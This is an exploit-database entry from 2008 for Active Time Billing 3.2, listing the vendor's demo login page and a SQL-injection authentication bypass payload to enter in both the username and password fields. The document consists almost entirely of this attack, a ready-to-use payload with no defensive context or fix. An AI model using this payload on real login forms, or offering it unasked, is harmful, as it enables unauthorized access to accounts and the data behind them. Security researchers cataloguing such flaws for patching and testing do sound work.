id: 4320
date: 11/30/2008
title: Active Time Billing 3.2 (Auth Bypass) SQL Injection Vulnerability
author: AlpHaNiX
cves: 

=================================================================
Active Time Billing 3.2 (Auth Bypass) SQL Injection Vulnerability 
=================================================================

###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


#found by : OffensiveTrack
#Author : AlpHaNiX
###########################################################################




#script : Active timebilling
#?xploit : http://www.activewebsoftwares.com/demoactivetimebilling/Account.asp


  username: r0' or ' 1=1--
  password: r0' or ' 1=1--




#  0day.today [2023-03-21]  #